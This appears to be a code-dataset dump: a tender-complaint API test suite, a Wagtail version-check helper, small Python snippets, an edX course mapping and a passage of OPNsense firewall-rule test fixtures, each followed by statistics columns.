super(TenderAwardComplaintSwitchResourceTest, self).setUp()
# Create award
response = self.app.post_json('/tenders/{}/awards'.format(
self.tender_id), {'data': {'suppliers': [self.initial_data["procuringEntity"]], 'status': 'pending', 'bid_id': self.initial_bids[0]['id']}})
award = response.json['data']
self.award_id = award['id']
def test_switch_to_pending(self):
response = self.app.post_json('/tenders/{}/awards/{}/complaints'.format(self.tender_id, self.award_id), {'data': {
'title': 'complaint title',
'description': 'complaint description',
'author': self.initial_data["procuringEntity"],
'status': 'claim'
}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.json['data']['status'], 'claim')
response = self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active")
tender = self.db.get(self.tender_id)
tender['awards'][0]['complaints'][0]['dateSubmitted'] = '2014-01-01'
self.db.save(tender)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['awards'][0]["complaints"][0]['status'], 'pending')
def test_switch_to_complaint(self):
response = self.app.patch_json('/tenders/{}/awards/{}'.format(self.tender_id, self.award_id), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "active")
for status in ['invalid', 'resolved', 'declined']:
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards/{}/complaints'.format(self.tender_id, self.award_id), {'data': {
'title': 'complaint title',
'description': 'complaint description',
'author': self.initial_data["procuringEntity"],
'status': 'claim'
}})
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.json['data']['status'], 'claim')
complaint = response.json['data']
response = self.app.patch_json('/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(self.tender_id, self.award_id, complaint['id'], self.tender_token), {"data": {
"status": "answered",
"resolutionType": status
}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['data']["status"], "answered")
self.assertEqual(response.json['data']["resolutionType"], status)
tender = self.db.get(self.tender_id)
tender['awards'][0]['complaints'][-1]['dateAnswered'] = '2014-01-01'
self.db.save(tender)
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {'data': {'id': self.tender_id}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['awards'][0]["complaints"][-1]['status'], status)
class TenderLotAwardComplaintSwitchResourceTest(TenderAwardComplaintSwitchResourceTest):
initial_lots = test_lots
def setUp(self):
super(TenderAwardComplaintSwitchResourceTest, self).setUp()
# Create award
response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id), {'data': {
'suppliers': [self.initial_data["procuringEntity"]],
'status': 'pending',
'bid_id': self.initial_bids[0]['id'],
'lotID': self.initial_bids[0]['lotValues'][0]['relatedLot']
}})
award = response.json['data']
self.award_id = award['id']
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TenderAwardComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(TenderComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(TenderLotAwardComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(TenderLotComplaintSwitchResourceTest))
suite.addTest(unittest.makeSuite(TenderLotSwitchAuctionResourceTest))
suite.addTest(unittest.makeSuite(TenderLotSwitchQualificationResourceTest))
suite.addTest(unittest.makeSuite(TenderLotSwitchUnsuccessfulResourceTest))
suite.addTest(unittest.makeSuite(TenderSwitchAuctionResourceTest))
suite.addTest(unittest.makeSuite(TenderSwitchQualificationResourceTest))
suite.addTest(unittest.makeSuite(TenderSwitchUnsuccessfulResourceTest))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| 51.068852
| 179
| 0.656009
| 1,613
| 15,576
| 6.203968
| 0.075635
| 0.094434
| 0.137903
| 0.050365
| 0.834416
| 0.822624
| 0.818927
| 0.79994
| 0.79994
| 0.778855
| 0
| 0.015946
| 0.174628
| 15,576
| 304
| 180
| 51.236842
| 0.762446
| 0.003017
| 0
| 0.741667
| 0
| 0
| 0.207343
| 0.021643
| 0
| 0
| 0
| 0
| 0.279167
| 1
| 0.070833
| false
| 0
| 0.008333
| 0
| 0.220833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9321dbb6daf530700d56a9ac0c8fab97f59e9d76
| 430
|
py
|
Python
|
wagtaillinkchecker/utils.py
|
spapas/wagtail-linkchecker
|
c94114b0c91e90af778fad053d27228a8e4eb980
|
[
"BSD-3-Clause"
] | 26
|
2016-01-21T00:40:25.000Z
|
2019-01-31T03:52:38.000Z
|
wagtaillinkchecker/utils.py
|
spapas/wagtail-linkchecker
|
c94114b0c91e90af778fad053d27228a8e4eb980
|
[
"BSD-3-Clause"
] | 13
|
2019-03-13T17:54:22.000Z
|
2022-03-08T00:10:09.000Z
|
wagtaillinkchecker/utils.py
|
spapas/wagtail-linkchecker
|
c94114b0c91e90af778fad053d27228a8e4eb980
|
[
"BSD-3-Clause"
] | 15
|
2019-04-08T10:43:14.000Z
|
2022-03-01T01:32:52.000Z
|
import re
from wagtail import __version__ as WAGTAIL_VERSION
def is_wagtail_version_more_than_equal_to_2_5():
expression = '^((2.([5-9]{1,}|([1-9]{1,}[0-9]{1,}))(.\d+)*)|(([3-9]{1,})(.\d+)*))$'
return re.search(expression, WAGTAIL_VERSION)
def is_wagtail_version_more_than_equal_to_2_0():
expression = '^((2.([0-9]{1,}|([1-9]{1,}[0-9]{1,}))(.\d+)*)|(([3-9]{1,})(.\d+)*))$'
return re.search(expression, WAGTAIL_VERSION)
| 26.875
| 84
| 0.625581
| 73
| 430
| 3.369863
| 0.30137
| 0.065041
| 0.04878
| 0.154472
| 0.756098
| 0.756098
| 0.756098
| 0.756098
| 0.756098
| 0.756098
| 0
| 0.075949
| 0.081395
| 430
| 15
| 85
| 28.666667
| 0.546835
| 0
| 0
| 0.25
| 0
| 0.25
| 0.317016
| 0.317016
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
4f082d05cc6f74fcb5cea306f7e727c15b4efdba
| 54
|
py
|
Python
|
imports/file1.py
|
gunnarpope/python
|
4cef021cf414c29bbc61485b57b4f6e533d5c0c8
|
[
"MIT"
] | 1
|
2019-01-24T22:17:51.000Z
|
2019-01-24T22:17:51.000Z
|
imports/file1.py
|
gunnarpope/python
|
4cef021cf414c29bbc61485b57b4f6e533d5c0c8
|
[
"MIT"
] | 1
|
2021-06-02T00:16:12.000Z
|
2021-06-02T00:16:12.000Z
|
imports/file1.py
|
gunnarpope/python
|
4cef021cf414c29bbc61485b57b4f6e533d5c0c8
|
[
"MIT"
] | null | null | null |
from file2 import data
def printout():
print(data)
| 9
| 22
| 0.722222
| 8
| 54
| 4.875
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022727
| 0.185185
| 54
| 5
| 23
| 10.8
| 0.863636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
879b6bc9899678f394bed531c878b084306de3e1
| 267
|
py
|
Python
|
Codewars/7kyu/relatively-prime-numbers/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | 7
|
2017-09-20T16:40:39.000Z
|
2021-08-31T18:15:08.000Z
|
Codewars/7kyu/relatively-prime-numbers/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
Codewars/7kyu/relatively-prime-numbers/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
# Python - 3.6.0
test.assert_equals(relatively_prime(8, [1, 2, 3, 4, 5, 6, 7]), [1, 3, 5, 7])
test.assert_equals(relatively_prime(15, [72, 27, 32, 61, 77, 11, 40]), [32, 61, 77, 11])
test.assert_equals(relatively_prime(210, [15, 100, 2222222, 6, 4, 12369, 99]), [])
| 44.5
| 88
| 0.629213
| 51
| 267
| 3.176471
| 0.54902
| 0.185185
| 0.296296
| 0.481481
| 0.574074
| 0
| 0
| 0
| 0
| 0
| 0
| 0.275109
| 0.142322
| 267
| 5
| 89
| 53.4
| 0.432314
| 0.052434
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
87b830eb8ab6e2e9c7128e768908d2c9d6f5b5a3
| 211
|
py
|
Python
|
tests/parser/aggregates.min.propagation.4.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.min.propagation.4.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.min.propagation.4.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
c(1).
c(2).
c(3).
a(X) | -a(X) :- c(X).
minim(X) :- a(X), #min{ D : a(D) } = X.
"""
output = """
c(1).
c(2).
c(3).
a(X) | -a(X) :- c(X).
minim(X) :- a(X), #min{ D : a(D) } = X.
"""
| 11.105263
| 40
| 0.308057
| 44
| 211
| 1.477273
| 0.25
| 0.184615
| 0.184615
| 0.123077
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0.830769
| 0
| 0.040268
| 0.293839
| 211
| 18
| 41
| 11.722222
| 0.395973
| 0
| 0
| 0.857143
| 0
| 0.142857
| 0.84264
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
87d1376eea5941afbf9f23cfb70d0e2faad54cca
| 2,695
|
py
|
Python
|
courses.py
|
UQ-UQx/old_injestor
|
e4add6d08239875af7b2669a29814e8679fffcb0
|
[
"MIT"
] | null | null | null |
courses.py
|
UQ-UQx/old_injestor
|
e4add6d08239875af7b2669a29814e8679fffcb0
|
[
"MIT"
] | 1
|
2021-06-01T21:53:15.000Z
|
2021-06-01T21:53:15.000Z
|
courses.py
|
UQ-UQx/old_injestor
|
e4add6d08239875af7b2669a29814e8679fffcb0
|
[
"MIT"
] | null | null | null |
"""
EDX_DATABASES = {
'think_101x': {'dbname': 'UQx_Think101x_1T2014', 'mongoname': 'UQx/Think101x/1T2014', 'discussiontable': 'UQx-HYPERS301x-1T2014-prod', 'icon': 'fa-heart'},
'hypers_301x': {'dbname': 'UQx_HYPERS301x_1T2014', 'mongoname': 'UQx/HYPERS301x/1T2014', 'discussiontable': 'UQx-HYPERS301x-1T2014-prod', 'icon': 'fa-plane'},
'tropic_101x': {'dbname': 'UQx_TROPIC101x_1T2014', 'mongoname': 'UQx/TROPIC101x/1T2014', 'discussiontable': 'UQx-TROPIC101x-1T2014-prod', 'icon': 'fa-tree'},
'bioimg_101x': {'dbname': 'UQx_BIOIMG101x_1T2014', 'mongoname': 'UQx/BIOIMG101x/1T2014', 'discussiontable': 'UQx-BIOIMG101x-1T2014-prod', 'icon': 'fa-desktop'},
'crime_101x': {'dbname': 'UQx_Crime101x_3T2014', 'mongoname': 'UQx/Crime101x/3T2014', 'discussiontable': 'UQx-Crime101x-3T2014-prod', 'icon': 'fa-gavel'},
'world_101x': {'dbname': 'UQx_World101x_3T2014', 'mongoname': 'UQx/World101x/3T2014', 'discussiontable': 'UQx-World101x-3T2014-prod', 'icon': 'fa-map-marker'},
'write_101x': {'dbname': 'UQx_Write101x_3T2014', 'mongoname': 'UQx/Write101x/3T2014', 'discussiontable': 'UQx-Write101x-3T2014-prod', 'icon': 'fa-pencil'},
'sense_101x': {'dbname': 'UQx_Sense101x_3T2014', 'mongoname': 'UQx/Sense101x/3T2014', 'discussiontable': 'UQx-Sense101x-3T2014-prod', 'icon': 'fa-power-off'}
}
"""
EDX_DATABASES = {
'think_101x_1T2014': {'dbname': 'UQx_Think101x_1T2014', 'mongoname': 'UQx/Think101x/1T2014', 'discussiontable': 'UQx-HYPERS301x-1T2014-prod', 'icon': 'fa-heart'},
'hypers_301x_1T2014': {'dbname': 'UQx_HYPERS301x_1T2014', 'mongoname': 'UQx/HYPERS301x/1T2014', 'discussiontable': 'UQx-HYPERS301x-1T2014-prod', 'icon': 'fa-plane'},
'tropic_101x_1T2014': {'dbname': 'UQx_TROPIC101x_1T2014', 'mongoname': 'UQx/TROPIC101x/1T2014', 'discussiontable': 'UQx-TROPIC101x-1T2014-prod', 'icon': 'fa-tree'},
'bioimg_101x_1T2014': {'dbname': 'UQx_BIOIMG101x_1T2014', 'mongoname': 'UQx/BIOIMG101x/1T2014', 'discussiontable': 'UQx-BIOIMG101x-1T2014-prod', 'icon': 'fa-desktop'},
'crime_101x_3T2014': {'dbname': 'UQx_Crime101x_3T2014', 'mongoname': 'UQx/Crime101x/3T2014', 'discussiontable': 'UQx-Crime101x-3T2014-prod', 'icon': 'fa-gavel'},
'world_101x_3T2014': {'dbname': 'UQx_World101x_3T2014', 'mongoname': 'UQx/World101x/3T2014', 'discussiontable': 'UQx-World101x-3T2014-prod', 'icon': 'fa-map-marker'},
'write_101x_3T2014': {'dbname': 'UQx_Write101x_3T2014', 'mongoname': 'UQx/Write101x/3T2014', 'discussiontable': 'UQx-Write101x-3T2014-prod', 'icon': 'fa-pencil'},
'sense_101x_3T2014': {'dbname': 'UQx_Sense101x_3T2014', 'mongoname': 'UQx/Sense101x/3T2014', 'discussiontable': 'UQx-Sense101x-3T2014-prod', 'icon': 'fa-power-off'},
}
| 117.173913
| 171
| 0.705751
| 304
| 2,695
| 6.065789
| 0.128289
| 0.078091
| 0.086768
| 0.069414
| 0.951193
| 0.951193
| 0.951193
| 0.951193
| 0.951193
| 0.951193
| 0
| 0.190553
| 0.080891
| 2,695
| 23
| 172
| 117.173913
| 0.553896
| 0.48757
| 0
| 0
| 0
| 0
| 0.739447
| 0.240175
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
359720adad99a4f9758bbe6949d1f71d55eeaccb
| 95,920
|
py
|
Python
|
opnsense_cli/tests/commands/plugin/test_firewall_rule.py
|
jan-win1993/opn-cli
|
83c4792571dacbe6483722a95276954c7a2d0b3c
|
[
"BSD-2-Clause"
] | 13
|
2021-05-17T10:42:25.000Z
|
2022-02-21T02:10:41.000Z
|
opnsense_cli/tests/commands/plugin/test_firewall_rule.py
|
jan-win1993/opn-cli
|
83c4792571dacbe6483722a95276954c7a2d0b3c
|
[
"BSD-2-Clause"
] | 14
|
2021-05-17T13:53:27.000Z
|
2021-12-16T12:45:44.000Z
|
opnsense_cli/tests/commands/plugin/test_firewall_rule.py
|
jan-win1993/opn-cli
|
83c4792571dacbe6483722a95276954c7a2d0b3c
|
[
"BSD-2-Clause"
] | 2
|
2021-04-28T08:41:07.000Z
|
2022-03-28T10:20:51.000Z
|
from unittest.mock import patch, Mock
from opnsense_cli.commands.plugin.firewall.rule import rule
from opnsense_cli.tests.commands.base import CommandTestCase
class TestFirewallRuleCommands(CommandTestCase):
def setUp(self):
self._api_data_fixtures_savepoint_OK = {
"status": "ok",
"retention": "60",
"revision": "1626265654.2136"
}
self._api_data_fixtures_savepoint_FAILED = {
"status": "failed",
}
self._api_data_fixtures_apply_OK = {
"status": "OK\n\n",
}
self._api_data_fixtures_apply_FAILED = {
"status": "FAILED\n\n",
}
self._api_data_fixtures_cancel_rollback_OK = {
"status": "\n\n",
}
self._api_data_fixtures_cancel_rollback_FAILED = {
"status": "failed\n\n",
}
self._api_data_fixtures_create_OK = {
"result": "saved",
"uuid": "85282721-934c-42be-ba4d-a93cbfda26af"
}
self._api_data_fixtures_create_ERROR = {
"result": "failed",
"validations": {"rule.source_net": "alias_not_exists is not a valid source IP address or alias."}
}
self._api_data_fixtures_update_OK = {
"result": "saved"
}
self._api_data_fixtures_update_NOT_EXISTS = {
"result": "failed"
}
self._api_data_fixtures_delete_NOT_FOUND = {
"result": "not found"
}
self._api_data_fixtures_delete_OK = {
"result": "deleted"
}
self._api_data_fixtures_list = {
"filter": {
"rules": {
"rule": {
"b468c719-89db-45a8-bd02-b081246dc002": {
"enabled": "1",
"sequence": "1",
"action": {
"pass": {
"value": "Pass",
"selected": 1
},
"block": {
"value": "Block",
"selected": 0
},
"reject": {
"value": "Reject",
"selected": 0
}
},
"quick": "1",
"interface": {
"lan": {
"value": "LAN",
"selected": 1
},
"lo0": {
"value": "Loopback",
"selected": 0
},
"wan": {
"value": "WAN",
"selected": 0
}
},
"direction": {
"in": {
"value": "In",
"selected": 1
},
"out": {
"value": "Out",
"selected": 0
}
},
"ipprotocol": {
"inet": {
"value": "IPv4",
"selected": 1
},
"inet6": {
"value": "IPv6",
"selected": 0
}
},
"protocol": {
"any": {
"value": "any",
"selected": 0
},
"ICMP": {
"value": "ICMP",
"selected": 0
},
"IGMP": {
"value": "IGMP",
"selected": 0
},
"GGP": {
"value": "GGP",
"selected": 0
},
"IPENCAP": {
"value": "IPENCAP",
"selected": 0
},
"ST2": {
"value": "ST2",
"selected": 0
},
"TCP": {
"value": "TCP",
"selected": 1
},
"CBT": {
"value": "CBT",
"selected": 0
},
"EGP": {
"value": "EGP",
"selected": 0
},
"IGP": {
"value": "IGP",
"selected": 0
},
"BBN-RCC": {
"value": "BBN-RCC",
"selected": 0
},
"NVP": {
"value": "NVP",
"selected": 0
},
"PUP": {
"value": "PUP",
"selected": 0
},
"ARGUS": {
"value": "ARGUS",
"selected": 0
},
"EMCON": {
"value": "EMCON",
"selected": 0
},
"XNET": {
"value": "XNET",
"selected": 0
},
"CHAOS": {
"value": "CHAOS",
"selected": 0
},
"UDP": {
"value": "UDP",
"selected": 0
},
"MUX": {
"value": "MUX",
"selected": 0
},
"DCN": {
"value": "DCN",
"selected": 0
},
"HMP": {
"value": "HMP",
"selected": 0
},
"PRM": {
"value": "PRM",
"selected": 0
},
"XNS-IDP": {
"value": "XNS-IDP",
"selected": 0
},
"TRUNK-1": {
"value": "TRUNK-1",
"selected": 0
},
"TRUNK-2": {
"value": "TRUNK-2",
"selected": 0
},
"LEAF-1": {
"value": "LEAF-1",
"selected": 0
},
"LEAF-2": {
"value": "LEAF-2",
"selected": 0
},
"RDP": {
"value": "RDP",
"selected": 0
},
"IRTP": {
"value": "IRTP",
"selected": 0
},
"ISO-TP4": {
"value": "ISO-TP4",
"selected": 0
},
"NETBLT": {
"value": "NETBLT",
"selected": 0
},
"MFE-NSP": {
"value": "MFE-NSP",
"selected": 0
},
"MERIT-INP": {
"value": "MERIT-INP",
"selected": 0
},
"DCCP": {
"value": "DCCP",
"selected": 0
},
"3PC": {
"value": "3PC",
"selected": 0
},
"IDPR": {
"value": "IDPR",
"selected": 0
},
"XTP": {
"value": "XTP",
"selected": 0
},
"DDP": {
"value": "DDP",
"selected": 0
},
"IDPR-CMTP": {
"value": "IDPR-CMTP",
"selected": 0
},
"TP++": {
"value": "TP++",
"selected": 0
},
"IL": {
"value": "IL",
"selected": 0
},
"IPV6": {
"value": "IPV6",
"selected": 0
},
"SDRP": {
"value": "SDRP",
"selected": 0
},
"IDRP": {
"value": "IDRP",
"selected": 0
},
"RSVP": {
"value": "RSVP",
"selected": 0
},
"GRE": {
"value": "GRE",
"selected": 0
},
"DSR": {
"value": "DSR",
"selected": 0
},
"BNA": {
"value": "BNA",
"selected": 0
},
"ESP": {
"value": "ESP",
"selected": 0
},
"AH": {
"value": "AH",
"selected": 0
},
"I-NLSP": {
"value": "I-NLSP",
"selected": 0
},
"SWIPE": {
"value": "SWIPE",
"selected": 0
},
"NARP": {
"value": "NARP",
"selected": 0
},
"MOBILE": {
"value": "MOBILE",
"selected": 0
},
"TLSP": {
"value": "TLSP",
"selected": 0
},
"SKIP": {
"value": "SKIP",
"selected": 0
},
"IPV6-ICMP": {
"value": "IPV6-ICMP",
"selected": 0
},
"CFTP": {
"value": "CFTP",
"selected": 0
},
"SAT-EXPAK": {
"value": "SAT-EXPAK",
"selected": 0
},
"KRYPTOLAN": {
"value": "KRYPTOLAN",
"selected": 0
},
"RVD": {
"value": "RVD",
"selected": 0
},
"IPPC": {
"value": "IPPC",
"selected": 0
},
"SAT-MON": {
"value": "SAT-MON",
"selected": 0
},
"VISA": {
"value": "VISA",
"selected": 0
},
"IPCV": {
"value": "IPCV",
"selected": 0
},
"CPNX": {
"value": "CPNX",
"selected": 0
},
"CPHB": {
"value": "CPHB",
"selected": 0
},
"WSN": {
"value": "WSN",
"selected": 0
},
"PVP": {
"value": "PVP",
"selected": 0
},
"BR-SAT-MON": {
"value": "BR-SAT-MON",
"selected": 0
},
"SUN-ND": {
"value": "SUN-ND",
"selected": 0
},
"WB-MON": {
"value": "WB-MON",
"selected": 0
},
"WB-EXPAK": {
"value": "WB-EXPAK",
"selected": 0
},
"ISO-IP": {
"value": "ISO-IP",
"selected": 0
},
"VMTP": {
"value": "VMTP",
"selected": 0
},
"SECURE-VMTP": {
"value": "SECURE-VMTP",
"selected": 0
},
"VINES": {
"value": "VINES",
"selected": 0
},
"TTP": {
"value": "TTP",
"selected": 0
},
"NSFNET-IGP": {
"value": "NSFNET-IGP",
"selected": 0
},
"DGP": {
"value": "DGP",
"selected": 0
},
"TCF": {
"value": "TCF",
"selected": 0
},
"EIGRP": {
"value": "EIGRP",
"selected": 0
},
"OSPF": {
"value": "OSPF",
"selected": 0
},
"SPRITE-RPC": {
"value": "SPRITE-RPC",
"selected": 0
},
"LARP": {
"value": "LARP",
"selected": 0
},
"MTP": {
"value": "MTP",
"selected": 0
},
"AX.25": {
"value": "AX.25",
"selected": 0
},
"IPIP": {
"value": "IPIP",
"selected": 0
},
"MICP": {
"value": "MICP",
"selected": 0
},
"SCC-SP": {
"value": "SCC-SP",
"selected": 0
},
"ETHERIP": {
"value": "ETHERIP",
"selected": 0
},
"ENCAP": {
"value": "ENCAP",
"selected": 0
},
"GMTP": {
"value": "GMTP",
"selected": 0
},
"IFMP": {
"value": "IFMP",
"selected": 0
},
"PNNI": {
"value": "PNNI",
"selected": 0
},
"PIM": {
"value": "PIM",
"selected": 0
},
"ARIS": {
"value": "ARIS",
"selected": 0
},
"SCPS": {
"value": "SCPS",
"selected": 0
},
"QNX": {
"value": "QNX",
"selected": 0
},
"A/N": {
"value": "A/N",
"selected": 0
},
"IPCOMP": {
"value": "IPCOMP",
"selected": 0
},
"SNP": {
"value": "SNP",
"selected": 0
},
"COMPAQ-PEER": {
"value": "COMPAQ-PEER",
"selected": 0
},
"IPX-IN-IP": {
"value": "IPX-IN-IP",
"selected": 0
},
"CARP": {
"value": "CARP",
"selected": 0
},
"PGM": {
"value": "PGM",
"selected": 0
},
"L2TP": {
"value": "L2TP",
"selected": 0
},
"DDX": {
"value": "DDX",
"selected": 0
},
"IATP": {
"value": "IATP",
"selected": 0
},
"STP": {
"value": "STP",
"selected": 0
},
"SRP": {
"value": "SRP",
"selected": 0
},
"UTI": {
"value": "UTI",
"selected": 0
},
"SMP": {
"value": "SMP",
"selected": 0
},
"SM": {
"value": "SM",
"selected": 0
},
"PTP": {
"value": "PTP",
"selected": 0
},
"ISIS": {
"value": "ISIS",
"selected": 0
},
"CRTP": {
"value": "CRTP",
"selected": 0
},
"CRUDP": {
"value": "CRUDP",
"selected": 0
},
"SPS": {
"value": "SPS",
"selected": 0
},
"PIPE": {
"value": "PIPE",
"selected": 0
},
"SCTP": {
"value": "SCTP",
"selected": 0
},
"FC": {
"value": "FC",
"selected": 0
},
"RSVP-E2E-IGNORE": {
"value": "RSVP-E2E-IGNORE",
"selected": 0
},
"UDPLITE": {
"value": "UDPLITE",
"selected": 0
},
"MPLS-IN-IP": {
"value": "MPLS-IN-IP",
"selected": 0
},
"MANET": {
"value": "MANET",
"selected": 0
},
"HIP": {
"value": "HIP",
"selected": 0
},
"SHIM6": {
"value": "SHIM6",
"selected": 0
},
"WESP": {
"value": "WESP",
"selected": 0
},
"ROHC": {
"value": "ROHC",
"selected": 0
},
"PFSYNC": {
"value": "PFSYNC",
"selected": 0
},
"DIVERT": {
"value": "DIVERT",
"selected": 0
}
},
"source_net": "10.0.0.0/24",
"source_not": "0",
"source_port": "80",
"destination_net": "192.168.0.0/24",
"destination_not": "0",
"destination_port": "http",
"gateway": {
"": {
"value": "none",
"selected": True
},
"Null4": {
"value": "Null4 - 127.0.0.1",
"selected": 0
},
"Null6": {
"value": "Null6 - ::1",
"selected": 0
},
"WAN_DHCP": {
"value": "WAN_DHCP - 10.0.2.2",
"selected": 0
},
"WAN_DHCP6": {
"value": "WAN_DHCP6 - inet6",
"selected": 0
}
},
"log": "0",
"description": "test Rule astuerz"
},
"fb0e1f6c-9f39-46dd-9c98-27fc314a2429": {
"enabled": "1",
"sequence": "5",
"action": {
"pass": {
"value": "Pass",
"selected": 1
},
"block": {
"value": "Block",
"selected": 0
},
"reject": {
"value": "Reject",
"selected": 0
}
},
"quick": "1",
"interface": {
"lan": {
"value": "LAN",
"selected": 1
},
"lo0": {
"value": "Loopback",
"selected": 0
},
"wan": {
"value": "WAN",
"selected": 0
}
},
"direction": {
"in": {
"value": "In",
"selected": 1
},
"out": {
"value": "Out",
"selected": 0
}
},
"ipprotocol": {
"inet": {
"value": "IPv4",
"selected": 1
},
"inet6": {
"value": "IPv6",
"selected": 0
}
},
"protocol": {
"any": {
"value": "any",
"selected": 0
},
"ICMP": {
"value": "ICMP",
"selected": 0
},
"IGMP": {
"value": "IGMP",
"selected": 0
},
"GGP": {
"value": "GGP",
"selected": 0
},
"IPENCAP": {
"value": "IPENCAP",
"selected": 0
},
"ST2": {
"value": "ST2",
"selected": 0
},
"TCP": {
"value": "TCP",
"selected": 1
},
"CBT": {
"value": "CBT",
"selected": 0
},
"EGP": {
"value": "EGP",
"selected": 0
},
"IGP": {
"value": "IGP",
"selected": 0
},
"BBN-RCC": {
"value": "BBN-RCC",
"selected": 0
},
"NVP": {
"value": "NVP",
"selected": 0
},
"PUP": {
"value": "PUP",
"selected": 0
},
"ARGUS": {
"value": "ARGUS",
"selected": 0
},
"EMCON": {
"value": "EMCON",
"selected": 0
},
"XNET": {
"value": "XNET",
"selected": 0
},
"CHAOS": {
"value": "CHAOS",
"selected": 0
},
"UDP": {
"value": "UDP",
"selected": 0
},
"MUX": {
"value": "MUX",
"selected": 0
},
"DCN": {
"value": "DCN",
"selected": 0
},
"HMP": {
"value": "HMP",
"selected": 0
},
"PRM": {
"value": "PRM",
"selected": 0
},
"XNS-IDP": {
"value": "XNS-IDP",
"selected": 0
},
"TRUNK-1": {
"value": "TRUNK-1",
"selected": 0
},
"TRUNK-2": {
"value": "TRUNK-2",
"selected": 0
},
"LEAF-1": {
"value": "LEAF-1",
"selected": 0
},
"LEAF-2": {
"value": "LEAF-2",
"selected": 0
},
"RDP": {
"value": "RDP",
"selected": 0
},
"IRTP": {
"value": "IRTP",
"selected": 0
},
"ISO-TP4": {
"value": "ISO-TP4",
"selected": 0
},
"NETBLT": {
"value": "NETBLT",
"selected": 0
},
"MFE-NSP": {
"value": "MFE-NSP",
"selected": 0
},
"MERIT-INP": {
"value": "MERIT-INP",
"selected": 0
},
"DCCP": {
"value": "DCCP",
"selected": 0
},
"3PC": {
"value": "3PC",
"selected": 0
},
"IDPR": {
"value": "IDPR",
"selected": 0
},
"XTP": {
"value": "XTP",
"selected": 0
},
